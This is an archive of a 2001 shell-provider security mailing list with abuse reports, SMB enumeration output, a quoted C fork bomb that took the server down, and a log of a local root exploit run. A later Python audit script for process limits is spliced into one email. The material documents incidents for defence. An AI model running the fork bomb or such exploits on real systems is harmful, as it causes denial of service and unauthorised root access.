From arpadffy@polarhome.com  Mon Aug 13 22:22:55 2001
Received: from sea (sea.polarhome.com [192.168.10.9])
	by gate.polarhome.com (8.11.2/8.8.7) with SMTP id f7DKMto07470
	for <security@polarhome.com>; Mon, 13 Aug 2001 22:22:55 +0200
Message-ID: <010e01c12436$a89bc7e0$090aa8c0@polarhome.com>
From: "Zoltan Arpadffy" <arpadffy@polarhome.com>
To: <security@polarhome.com>
Date: Mon, 13 Aug 2001 22:29:31 +0200
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
Subject: [Security] Fw: SMB/Samba troubles ...
Sender: security-admin@polarhome.com
Errors-To: security-admin@polarhome.com
X-BeenThere: security@polarhome.com
X-Mailman-Version: 2.0.5
Precedence: bulk
List-Help: <mailto:security-request@polarhome.com?subject=help>
List-Post: <mailto:security@polarhome.com>
List-Subscribe: <http://www.polarhome.com/mailman/listinfo/security>,
	<mailto:security-request@polarhome.com?subject=subscribe>
List-Id: Discussion about security issues <security.polarhome.com>
List-Unsubscribe: <http://www.polarhome.com/mailman/listinfo/security>,
	<mailto:security-request@polarhome.com?subject=unsubscribe>
List-Archive: <http://www.polarhome.com/pipermail/security/>

Thanks...

----- Original Message -----
From: "Ady R." <galaad2@polarhome.com>
To: <root@gate.polarhome.com>
Sent: Monday, August 13, 2001 10:06 AM


> Subject: SMB/Samba troubles ...
> hello, please take care about samba.. win9x machines are accessible from
> this shell accounts machine...
> if this is not intended to be available to the general public, please
> disable samba from the public machine
> and install ipchains/iptables rules to DENY/DROP such traffic
>
> c'ya
> galaad2 signing off... :p
>
> p.s. mmmmm... shared printers... i wonder if it/they has/have enough paper
> for what i intend to do...
> (just kidding.. :) )
>
>
>
> $findsmb
>
> IP ADDR         NETBIOS NAME   WORKGROUP/OS/VERSION
> ---------------------------------------------------------------------
> 192.168.10.7    TOM            [WORKGROUP]
> 192.168.10.9    SEA           +[WORKGROUP]
>
>
> $smbclient -L tom
>
> Unknown parameter encountered: "ssl CA certFile"
> Ignoring unknown parameter "ssl CA certFile"
> added interface ip=192.168.10.1 bcast=192.168.10.255 nmask=255.255.255.0
> added interface ip=213.66.228.148 bcast=213.66.228.255 nmask=255.255.255.0
>
>
> Sharename      Type      Comment
> ---------      ----      -------
> CDROM          Disk      TOM:CDROM
> WIN            Disk      TOM:C drive
> IPC$           IPC       Kommunikation mellan fjärranslutna processer
>
> Server               Comment
> ---------            -------
>
> Workgroup            Master
> ---------            -------
>
>
> $smbclient -L sea
>
> Unknown parameter encountered: "ssl CA certFile"
> Ignoring unknown parameter "ssl CA certFile"
> added interface ip=192.168.10.1 bcast=192.168.10.255 nmask=255.255.255.0
> added interface ip=213.66.228.148 bcast=213.66.228.255 nmask=255.255.255.0
>
>
> Sharename      Type      Comment
> ---------      ----      -------
> CDROM          Disk      CD reader (40x)
> CD-RW          Disk      CD writer (2x4x24)
> OTHER          Disk      OTHER Share
> HP-COLOR       Printer   HP DeskJet 690C Series v11.0
> PRINTER$       Disk
> HPDESKJET      Printer   HP DeskJet (Color)
> FLOPPY         Disk      3.5" floppy disk
> WIN            Disk
> IPC$           IPC       Kommunikation mellan fjärranslutna processer
>
> Server               Comment
> ---------            -------
>
> Workgroup            Master
> ---------            -------
> WORKGROUP            SEA


From leon@inyc.com  Tue Aug 21 03:11:23 2001
Received: from smtp10.atl.mindspring.net (smtp10.atl.mindspring.net [207.69.200.246])
	by gate.polarhome.com (8.11.2/8.8.7) with ESMTP id f7L1A0e10871
	for <security@polarhome.com>; Tue, 21 Aug 2001 03:11:22 +0200
Received: from FAD3R (user-11200kk.dsl.mindspring.com [66.32.2.148])
	by smtp10.atl.mindspring.net (8.9.3/8.8.5) with ESMTP id VAA20930
	for <security@polarhome.com>; Mon, 20 Aug 2001 21:09:54 -0400 (EDT)
From: "leon" <leon@inyc.com>
To: <security@polarhome.com>
Date: Mon, 20 Aug 2001 21:11:54 -0400
Message-ID: <!~!UENERkVCMDkAAQACAAAAAAAAAAAAAAAAABgAAAAAAAAA+8DoZCJ8SEaYk5pn4rrIf8KAAAAQAAAA7kLbdUJN1k6tGvhIf+gWugEAAAAA@inyc.com>
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0010_01C129BC.BF888430"
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.2627
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700
Importance: Normal
Subject: [Security] Warning!

This is a multi-part message in MIME format.

------=_NextPart_000_0010_01C129BC.BF888430
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit

Your system is busy scanning for people running vulnerable versions of
RPC's.   Is that allowed by your rules (using your system as a jump off
point to stage more attacks.)  Below is a snippet of the firewall log
all times are EST.
 
The firewall has blocked Internet access to your computer (TCP Port 111)
from 213.66.228.148 (TCP Port 49850) [TCP Flags: S].
 
Time: 8/20/2001 7:22:42 PM

------=_NextPart_000_0010_01C129BC.BF888430--


From arpadffy@polarhome.com  Tue Aug 21 08:41:53 2001
Received: from sea (sea.polarhome.com [192.168.10.9])
	by gate.polarhome.com (8.11.2/8.8.7) with SMTP id f7L6frR02353
	for <security@polarhome.com>; Tue, 21 Aug 2001 08:41:53 +0200
Message-ID: <000301c12a0d$517443c0$090aa8c0@polarhome.com>
From: "Zoltan Arpadffy" <arpadffy@polarhome.com>
To: <security@polarhome.com>
References: <Pine.LNX.4.33.0108201718510.348-100000@sisyphus.sympatico.ca>
Date: Tue, 21 Aug 2001 08:03:11 +0200
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
Subject: [Security] Re: Unauthorized access attempts from your site


----- Original Message -----
From: "Andrew Hamilton-Wright" <am2hamil@engmail.uwaterloo.ca>
To: "Zoltan Arpadffy" <arpadffy@polarhome.com>
Sent: Monday, August 20, 2001 11:23 PM
Subject: Re: Unauthorized access attempts from your site


> On Mon, 20 Aug 2001, Zoltan Arpadffy wrote:
>
> > hi,
> >
> > Personally, I'm terribly sorry about it, but I can not take a
> > responsibility for my users activity, however I can help to identify
> > the suspect.
>
> No problem -- as I said, I'm not really worried, but it seems that someone
> there is engaged in some funny business.
>
> I'm sure it is some "script kiddie", as the repeated attempts at the same
> port don't look like someone with much of a clue to me . . .
>
>
> > > Sun Aug 19 21:52:47 2001 Unrecognized access from 213.66.228.148:56443 to TCP port 111
> > > I trust that you can take this up with the individual involved?
>
> > If you can tell me what's the difference between CET (my timezone) and
> > yours, then I can probably eliminate about 2000 users.
> > But I can ensure you, that if it is proven, reported or seen that somebody
> > from this system does some malicious activity. This person and whole his
> > network finished his career at my site.
>
> Sure -- I am in EDT=GMT+5 (Toronto/New York), which put me 7 hours behind
> you (at least according to my zoneinfo records).  I take it you are in
> the middle of Europe somewhere?
>
>
> > This site is for educative purpose... everybody can hack me, but should not
> > use my site to hack others. One guy had been banned already and I'm not
> > afraid to kick other users who do not respect our rules.
> >  http://www.polarhome.com/hacker/
>
> Yeah -- I read a little of your info on the site.  Interesting stuff!
>
> Regards,
> Andrew.
>


From arpadffy@polarhome.com  Tue Aug 21 08:41:53 2001
Received: from sea (sea.polarhome.com [192.168.10.9])
	by gate.polarhome.com (8.11.2/8.8.7) with SMTP id f7L6frR02356;
	Tue, 21 Aug 2001 08:41:53 +0200
Message-ID: <000501c12a0d$51ae3f80$090aa8c0@polarhome.com>
From: "Zoltan Arpadffy" <arpadffy@polarhome.com>
To: "Daniel Scheftner" <dscheftner@ec.rr.com>, <security@polarhome.com>
References: <000a01c129cc$9ea27a40$d4a51a42@ec.rr.com>
Date: Tue, 21 Aug 2001 08:08:33 +0200
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0040_01C12A18.785FA3C0"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
Subject: [Security] Re: Read!!!!

This is a multi-part message in MIME format.

------=_NextPart_000_0040_01C12A18.785FA3C0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

hi,

Personally, I'm terribly sorry about it, but I can not take a responsibility
for my users' activity, however I can help to identify the suspect.

If you can send me some closer time of malicious activity, I could try to identify and kick out the user.
Thanks a lot for warning.

Regards,
Z



  ----- Original Message -----
  From: Daniel Scheftner
  To: legal@polarhome.com
  Sent: Tuesday, August 21, 2001 1:05 AM
  Subject: Read!!!!


  I'm sick & tired of your server attempting to access my computer...... GET THE BUGS OUT!!!!!!


------=_NextPart_000_0040_01C12A18.785FA3C0--


From arpadffy@polarhome.com  Tue Aug 21 08:41:53 2001
Received: from sea (sea.polarhome.com [192.168.10.9])
	by gate.polarhome.com (8.11.2/8.8.7) with SMTP id f7L6fqR02348;
	Tue, 21 Aug 2001 08:41:53 +0200
Message-ID: <000001c12a0d$51498a40$090aa8c0@polarhome.com>
From: "Zoltan Arpadffy" <arpadffy@polarhome.com>
To: "leon" <leon@inyc.com>, <security@polarhome.com>
References: <!~!UENERkVCMDkAAQACAAAAAAAAAAAAAAAAABgAAAAAAAAA+8DoZCJ8SEaYk5pn4rrIf8KAAAAQAAAA7kLbdUJN1k6tGvhIf+gWugEAAAAA@inyc.com>
Subject: Re: [Security] Warning!
Date: Tue, 21 Aug 2001 07:57:04 +0200
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_000A_01C12A16.DDEF9E40"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200

This is a multi-part message in MIME format.

------=_NextPart_000_000A_01C12A16.DDEF9E40
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

hi,

>Your system is busy scanning for people running vulnerable versions of RPC's.
>Is that allowed by your rules (using your system as a jump off point to stage more attacks.)

No it is not allowed... this kind of users will be kicked out.
Thanks for warning.

Regards,
Z

------=_NextPart_000_000A_01C12A16.DDEF9E40--


From zoltan.arpadffy@essnet.se  Tue Sep  4 12:44:53 2001
Received: from essnet.se (fwall.essnet.se [212.209.198.194])
	by gate.polarhome.com (8.11.2/8.8.7) with ESMTP id f84Aiqa07171
	for <security@polarhome.com>; Tue, 4 Sep 2001 12:44:53 +0200
Received: by fwall.essnet.se via suspension id <119048>; Tue, 4 Sep 2001 12:44:17 +0200
Received: from tfsgw.essnet.se ([194.132.53.235]) by fwall.essnet.se with SMTP id <119041>; Tue, 4 Sep 2001 11:42:42 +0200
Message-Id: <TFSLRPFN@essnet.se>
From: zoltan.arpadffy@essnet.se
Date:   Tue, 4 Sep 2001 11:41:03 +0200
To: security@polarhome.com
MIME-version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
X-Mailer: TFS Secure Messaging /300000031/221110291/221041054/221001705/
X-Mailer: Version 4.61 Build 202
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by gate.polarhome.com id f84Aiqa07171
Subject: [Security] FW from guest

From polarhome guest user <guest@polarhome.com>
To root@gate.polarhome.com
Date Tue, 4 Sep 2001 09:46:23 +0200

max user processes 32766 - from what i hear the box was forkbombed, and now you can see how.
------------------------------------------------------------------------
From polarhome guest user <guest@polarhome.com>
To root@gate.polarhome.com
Date Tue, 4 Sep 2001 09:48:16 +0200

<http://www.securedlinux.org> has a bunch of patches you may wanna apply that could stop this type of thing from happening, one of the applicable features is logging to syslog when a fork() attempt fails.....




From vineshpatel@btinternet.com  Wed Sep  5 18:54:45 2001
Received: from carbon.btinternet.com (carbon.btinternet.com [194.73.73.92])
	by gate.polarhome.com (8.11.2/8.8.7) with ESMTP id f85GsiN11340
	for <security@polarhome.com>; Wed, 5 Sep 2001 18:54:45 +0200
Received: from [213.1.108.102] (helo=vineshpatel1)
	by carbon.btinternet.com with smtp (Exim 3.22 #6)
	id 15efwp-0001Cc-00
	for security@polarhome.com; Wed, 05 Sep 2001 17:54:43 +0100
Message-ID: <000801c1362b$4a4f7720$666c01d5@vineshpatel1>
From: "Vinesh Patel" <vineshpatel@btinternet.com>
To: <security@polarhome.com>
Date: Wed, 5 Sep 2001 17:53:28 +0100
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0005_01C13633.AAFFB000"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Subject: [Security] (no subject)

This is a multi-part message in MIME format.

------=_NextPart_000_0005_01C13633.AAFFB000
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

i was wondering whether polarhome.com would be interested in letting me run a half life games server. however, the file for the server is fairly large  (much above the 10mb quota) and would require some help from polarhome, as there is a module which needs installing.

------=_NextPart_000_0005_01C13633.AAFFB000--


From arpadffy@polarfox.com  Thu Sep  6 15:37:19 2001
Received: from www3.aname.net (www3.aname.net [194.18.94.103])
	by gate.polarhome.com (8.11.2/8.8.7) with ESMTP id f86DbIN23806
	for <security@polarhome.com>; Thu, 6 Sep 2001 15:37:19 +0200
Received: from sea (h229n2fls31o873.telia.com [213.66.228.229])
	by www3.aname.net (8.11.6/8.11.3) with SMTP id f83KAWd14569;
	Mon, 3 Sep 2001 22:10:40 +0200
Message-ID: <004a01c134b5$83cd9da0$090aa8c0@polarhome.com>
From: "Zoltan Arpadffy" <arpadffy@polarfox.com>
To: <security@polarhome.com>
Cc: <info@redhat.com>
Date: Mon, 3 Sep 2001 22:17:44 +0200
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
Subject: [Security] cracked
Sender: security-admin@polarhome.com
Errors-To: security-admin@polarhome.com
X-BeenThere: security@polarhome.com
X-Mailman-Version: 2.0.5
Precedence: bulk
List-Help: <mailto:security-request@polarhome.com?subject=help>
List-Post: <mailto:security@polarhome.com>
List-Subscribe: <http://www.polarhome.com/mailman/listinfo/security>,
	<mailto:security-request@polarhome.com?subject=subscribe>
List-Id: Discussion about security issues <security.polarhome.com>
List-Unsubscribe: <http://www.polarhome.com/mailman/listinfo/security>,
	<mailto:security-request@polarhome.com?subject=unsubscribe>
List-Archive: <http://www.polarhome.com/pipermail/security/>

gate.polarhome.com has been cracked.

The attack was not constructive and it was directly against gate's
functionality.
The attacker used a PAM modules bug: it is not possible to configure the
/etc/security/limits.conf file with user environment limitations. This bug
has been submitted to Bugzilla several times (once by me), but RedHat didn't
take it with high importance.

Scenario:
guest user logged in.
guest    pts/108      Mon Sep  3 10:44 - 12:56  (02:11)
cmb5-152.dial-up.arnes.si
writes a c program:

#include <stdio.h>
main(){
    system("/usr/bin/uptime");
    while(1){
            fork();
    }
}

This program just overloads the system...

Normally /etc/security/limits.conf would easily stop this kind of
attack with
*       hard    nproc   100
... but not the buggy PAM :-)

Anyhow, a system with more than 3000 users was down.

root
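
A check for the failure described above, where `* hard nproc 100` is written in limits.conf but sessions are not actually capped. This is an added example, not part of the original message; the sample file contents, user and group names and function names are constructed for illustration, and the precedence rule is modelled on how pam_limits reads the file.

```python
"""Audit: is a hard nproc cap configured, loaded by PAM, and present in the session?"""
import resource

# Constructed sample inputs (not taken from gate.polarhome.com).
LIMITS_CONF = """\
# <domain>  <type>  <item>  <value>
*           hard    nproc   100
@staff      hard    nproc   400
guest       -       nproc   50
"""
PAM_WITH_LIMITS = """\
auth       required   pam_unix.so
session    required   pam_limits.so
session    required   pam_unix.so
"""
PAM_WITHOUT_LIMITS = """\
auth       required   pam_unix.so
#session   required   pam_limits.so
session    required   pam_unix.so
"""


def configured_hard_nproc(limits_text, user, groups=()):
    """Return the hard nproc cap limits.conf gives `user`; None means no cap.

    Assumed precedence: a user entry beats an @group entry, which beats '*'.
    Within one rank the last matching line wins. '*' never applies to root.
    """
    best_rank, best_value = -1, None
    for raw in limits_text.splitlines():
        fields = raw.split("#", 1)[0].split()
        if len(fields) != 4:
            continue
        domain, ltype, item, value = fields
        if item != "nproc" or ltype not in ("hard", "-"):
            continue  # '-' sets both soft and hard
        if domain == user:
            rank = 2
        elif domain.startswith("@") and domain[1:] in groups:
            rank = 1
        elif domain == "*" and user != "root":
            rank = 0
        else:
            continue
        if rank >= best_rank:
            best_rank = rank
            unlimited = value in ("unlimited", "infinity", "-1")
            best_value = None if unlimited else int(value)
    return best_value


def pam_limits_enabled(pam_text):
    """True if an uncommented 'session' line in this PAM file loads pam_limits.so."""
    for raw in pam_text.splitlines():
        fields = raw.split("#", 1)[0].split()
        if len(fields) >= 3 and fields[0].lstrip("-") == "session":
            # The module may follow a bracketed control field, so scan all tokens.
            if any(f.rsplit("/", 1)[-1] == "pam_limits.so" for f in fields[2:]):
                return True
    return False


def live_hard_nproc():
    """Hard RLIMIT_NPROC of the current process (run this inside the user's session)."""
    return resource.getrlimit(resource.RLIMIT_NPROC)[1]


def audit(limits_text, pam_text, user, groups=(), live_hard=None):
    """Return findings; an empty list means the cap is configured and applied.

    live_hard is the value live_hard_nproc() reported inside a session of
    `user`; pass None to skip the comparison.
    """
    findings = []
    want = configured_hard_nproc(limits_text, user, groups)
    if want is None:
        findings.append("no hard nproc limit configured for %s" % user)
    if not pam_limits_enabled(pam_text):
        findings.append("pam_limits.so is not in the session stack")
    if want is not None and live_hard is not None:
        if live_hard == resource.RLIM_INFINITY or live_hard > want:
            shown = "unlimited" if live_hard == resource.RLIM_INFINITY else str(live_hard)
            findings.append("session hard nproc is %s, configured value is %d" % (shown, want))
    return findings


if __name__ == "__main__":
    # Compare the constructed config against the limit this process really has.
    for line in audit(LIMITS_CONF, PAM_WITHOUT_LIMITS, "guest",
                      live_hard=live_hard_nproc()) or ["ok"]:
        print(line)
```

The third finding is the one that matters for this incident: a correct limits.conf line proves nothing until the value is read back from inside a real login session.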



From archangeljulian@hotmail.com  Fri Sep  7 07:53:31 2001
Received: from hotmail.com (oe50.law14.hotmail.com [64.4.20.22])
	by gate.polarhome.com (8.11.2/8.8.7) with ESMTP id f875rTN05081
	for <security@polarhome.com>; Fri, 7 Sep 2001 07:53:30 +0200
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Thu, 6 Sep 2001 22:52:57 -0700
X-Originating-IP: [131.94.140.134]
From: "Julian" <archangeljulian@hotmail.com>
To: <security@polarhome.com>
Date: Fri, 7 Sep 2001 01:52:00 -0500
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0005_01C1373F.AF16D120"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Message-ID: <OE50a34PuQirKz2YzRJ000041a4@hotmail.com>
X-OriginalArrivalTime: 07 Sep 2001 05:52:57.0843 (UTC) FILETIME=[5873E430:01C13761]
Subject: [Security] dalnet irc server
Sender: security-admin@polarhome.com
Errors-To: security-admin@polarhome.com
X-BeenThere: security@polarhome.com
X-Mailman-Version: 2.0.5
Precedence: bulk
List-Help: <mailto:security-request@polarhome.com?subject=help>
List-Post: <mailto:security@polarhome.com>
List-Subscribe: <http://www.polarhome.com/mailman/listinfo/security>,
	<mailto:security-request@polarhome.com?subject=subscribe>
List-Id: Discussion about security issues <security.polarhome.com>
List-Unsubscribe: <http://www.polarhome.com/mailman/listinfo/security>,
	<mailto:security-request@polarhome.com?subject=unsubscribe>
List-Archive: <http://www.polarhome.com/pipermail/security/>

This is a multi-part message in MIME format.

------=_NextPart_000_0005_01C1373F.AF16D120
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

[07:48] -NOTICE- *** Autokilled for [ma/web] Web Site or Server Advertising is not allowed on DALnet. If you continue, we'll notify your web provider and ISP. See http://kline.dal.net/massads/mup.htm [AKILL ID:999838998K-c] (2001/09/07 00.33)

Some jerk keeps using polarhome's free shell to advertise on DALnet,
getting our eggdrops to be klined :(
Would be good if there was a policy to obey the irc server's rules under
the penalty of exclusion, as well as contact dalnet to let them know that
the mentioned hostmask is a shell, so they won't kline everyone, but just
the aggressor.
Thank you

------=_NextPart_000_0005_01C1373F.AF16D120--

From zoli@polarhome.com  Fri Sep  7 08:09:37 2001
Received: from alice (alice.polarhome.com [192.168.10.5])
	by gate.polarhome.com (8.11.2/8.8.7) with SMTP id f8769bN08832;
	Fri, 7 Sep 2001 08:09:37 +0200
Message-ID: <003001c13763$9de36520$050aa8c0@polarhome.com>
From: "Zoltan Arpadffy" <zoli@polarhome.com>
To: "Julian" <archangeljulian@hotmail.com>, <security@polarhome.com>
References: <OE50a34PuQirKz2YzRJ000041a4@hotmail.com>
Subject: Re: [Security] dalnet irc server
Date: Fri, 7 Sep 2001 08:08:16 +0200
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0029_01C13774.3FDD8260"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.00.2919.6600
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6600
Sender: security-admin@polarhome.com
Errors-To: security-admin@polarhome.com
X-BeenThere: security@polarhome.com
X-Mailman-Version: 2.0.5
Precedence: bulk
List-Help: <mailto:security-request@polarhome.com?subject=help>
List-Post: <mailto:security@polarhome.com>
List-Subscribe: <http://www.polarhome.com/mailman/listinfo/security>,
	<mailto:security-request@polarhome.com?subject=subscribe>
List-Id: Discussion about security issues <security.polarhome.com>
List-Unsubscribe: <http://www.polarhome.com/mailman/listinfo/security>,
	<mailto:security-request@polarhome.com?subject=unsubscribe>
List-Archive: <http://www.polarhome.com/pipermail/security/>

This is a multi-part message in MIME format.

------=_NextPart_000_0029_01C13774.3FDD8260
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Julian,

as you could read, our policy does not allow any destructive activity,
especially remote, including IRC...
If you could send some closer details to identify the suspects, I could
act as hard as it had been described.

Thank you for positive approach.

Regards, Z

------=_NextPart_000_0029_01C13774.3FDD8260--


From ozzy@gate.polarhome.com  Thu Sep 20 11:47:23 2001
Received: from localhost (ozzy@localhost)
	by gate.polarhome.com (8.11.6/8.8.7) with ESMTP id f8K1SGQ15130;
	Thu, 20 Sep 2001 03:28:17 +0200
Date: Thu, 20 Sep 2001 03:28:14 +0200 (CEST)
From: Ventsislav Nikolov <ozzy@polarhome.com>
To: <security@polarhome.com>
cc: Ventsislav Nikolov <ozzy@gate.polarhome.com>
Message-ID: <Pine.LNX.4.33.0109200321060.11712-100000@gate.polarhome.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Subject: [Security] B - achieving root permisions from normal user account
Sender: security-admin@polarhome.com
Errors-To: security-admin@polarhome.com
X-BeenThere: security@polarhome.com
X-Mailman-Version: 2.0.6
Precedence: bulk
List-Help: <mailto:security-request@polarhome.com?subject=help>
List-Post: <mailto:security@polarhome.com>
List-Subscribe: <http://www.polarhome.com/mailman/listinfo/security>,
	<mailto:security-request@polarhome.com?subject=subscribe>
List-Id: Discussion about security issues <security.polarhome.com>
List-Unsubscribe: <http://www.polarhome.com/mailman/listinfo/security>,
	<mailto:security-request@polarhome.com?subject=unsubscribe>
List-Archive: <http://www.polarhome.com/pipermail/security/>

ozzy@gate~/hack$ ./epcs2
bug exploited successfully.
enjoy!
sh-2.04$ exit
ozzy@gate~/hack$ ./epcs2
ptrace: PTRACE_ATTACH: Operation not permitted
d0h! error!
ozzy@gate~/hack$ date
Thu Sep 20 03:20:32 CEST 2001

The source of the local exploit is /home/o/ozzy/hack/epcs2.c
Works the first time only after system reboot.
Actually it is for slackware but obviously works on RedHat 7.1.

^_^
Best wishes!
	Ventsislav Nikolov



From arpadffy@polarhome.com  Thu Sep 20 15:07:24 2001
Received: from sea (sea.polarhome.com [192.168.10.9])
	by gate.polarhome.com (8.11.6/8.8.7) with SMTP id f8K5d1E09769;
	Thu, 20 Sep 2001 07:39:02 +0200
Message-ID: <000201c14197$a6069180$090aa8c0@polarhome.com>
From: "Zoltan Arpadffy" <arpadffy@polarhome.com>
To: "Gareth Haynes" <djgazbag@hotmail.com>, <cristi@confiance.deltanet.ro>,
   <madalin@nimeni.org>, "Norman Roa" <norman_roa@hotmail.com>,
   "Maykel Constantin" <mnellocohsd@earthlink.net>,
   "Wulf" <wulf@zodiac-infosystems.co.uk>,
   "Csaba Korponai" <csabak@tina.tippnet.co.yu>, <security@polarhome.com>
Date: Wed, 19 Sep 2001 18:36:17 +0200
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0050_01C14139.F83D6900"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
Subject: [Security] Re: IRC link
Sender: security-admin@polarhome.com
Errors-To: security-admin@polarhome.com
X-BeenThere: security@polarhome.com
X-Mailman-Version: 2.0.6
Precedence: bulk
List-Help: <mailto:security-request@polarhome.com?subject=help>
List-Post: <mailto:security@polarhome.com>
List-Subscribe: <http://www.polarhome.com/mailman/listinfo/security>,
	<mailto:security-request@polarhome.com?subject=subscribe>
List-Id: Discussion about security issues <security.polarhome.com>
List-Unsubscribe: <http://www.polarhome.com/mailman/listinfo/security>,
	<mailto:security-request@polarhome.com?subject=unsubscribe>
List-Archive: <http://www.polarhome.com/pipermail/security/>

This is a multi-part message in MIME format.

------=_NextPart_000_0050_01C14139.F83D6900
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Gentlemen,

some information just to move forward the negotiation process...

1. polarhome.com can not and will not change host or domainname...
explanation: polarhome.com is well established domain, and anyway it is
running with DNS forwarder (thanks dante) that is quite complicated and
responsible to maintain...
2. irc.polarhome.com will continue to use ircd server
reason: it is a quite nice and configurable server (and I know it on
code level), on the other hand 3 of you want to change the current
installation to 3 different servers.

My opinion is:
1. for sure it is possible to connect different irc servers.
2. if it will be as complicated as some of you suggested (new server, new
names, new domains etc) then I would vote to keep as it is.

Please, consider these statements as well.

Regards,
Z
  ----- Original Message -----
  From: Zoltan Arpadffy
  To: Gareth Haynes ; cristi@confiance.deltanet.ro ; madalin@nimeni.org ;
  Norman Roa ; Maykel Constantin ; Wulf ; Csaba Korponai ;
  security@polarhome.com
  Sent: Wednesday, September 19, 2001 12:00 AM
  Subject: IRC link


  hi,

  as you could see, users voted to connect to some BIG IRC network, but
  as everybody knows, we don't have a good reputation because of free bots
  etc... then let's do "the small networks big connection" instead.

  Gentlemen,
  if you are interested, please send me your C/N records (regarding
  irc.polarhome.com), including suggested passwords, with connection class
  explanations etc, ASAP.

  Please note, that irc.polarhome.com is CNAME for gate.polarhome.com
  that runs with DHCP IP address:
  it means that it is very likely to change sometimes as well as identd
  response.

  Kind regards,
  Z






------=_NextPart_000_0050_01C14139.F83D6900--


From arpadffy@polarfox.com  Thu Sep 20 15:34:12 2001
Received: from www3.aname.net (www3.aname.net [194.18.94.103])
	by gate.polarhome.com (8.11.6/8.8.7) with ESMTP id f8KDYBE25547
	for <security@polarhome.com>; Thu, 20 Sep 2001 15:34:11 +0200
Received: from sea (h229n2fls31o873.telia.com [213.66.228.229])
	by www3.aname.net (8.11.6/8.11.3) with SMTP id f8JGlUs32683
	for <security@polarhome.com>; Wed, 19 Sep 2001 18:47:30 +0200
Message-ID: <008901c1412b$d8855360$090aa8c0@polarhome.com>
From: "Zoltan Arpadffy" <arpadffy@polarfox.com>
To: <security@polarhome.com>
Date: Wed, 19 Sep 2001 18:55:09 +0200
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0086_01C1413C.9AD6DBE0"
X-Priority: 1
X-MSMail-Priority: High
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
Subject: [Security] Fw: IRC link
Sender: security-admin@polarhome.com
Errors-To: security-admin@polarhome.com
X-BeenThere: security@polarhome.com
X-Mailman-Version: 2.0.6
Precedence: bulk
List-Help: <mailto:security-request@polarhome.com?subject=help>
List-Post: <mailto:security@polarhome.com>
List-Subscribe: <http://www.polarhome.com/mailman/listinfo/security>,
	<mailto:security-request@polarhome.com?subject=subscribe>
List-Id: Discussion about security issues <security.polarhome.com>
List-Unsubscribe: <http://www.polarhome.com/mailman/listinfo/security>,
	<mailto:security-request@polarhome.com?subject=unsubscribe>
List-Archive: <http://www.polarhome.com/pipermail/security/>

This is a multi-part message in MIME format.

------=_NextPart_000_0086_01C1413C.9AD6DBE0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable


----- Original Message -----
From: Zoltan Arpadffy
To: Gareth Haynes ; cristi@confiance.deltanet.ro ; madalin@nimeni.org ;
Norman Roa ; Maykel Constantin ; Wulf ; Csaba Korponai ;
security@polarhome.com
Sent: Wednesday, September 19, 2001 12:00 AM
Subject: IRC link


hi,

as you could see, users voted to connect to some BIG IRC network, but as
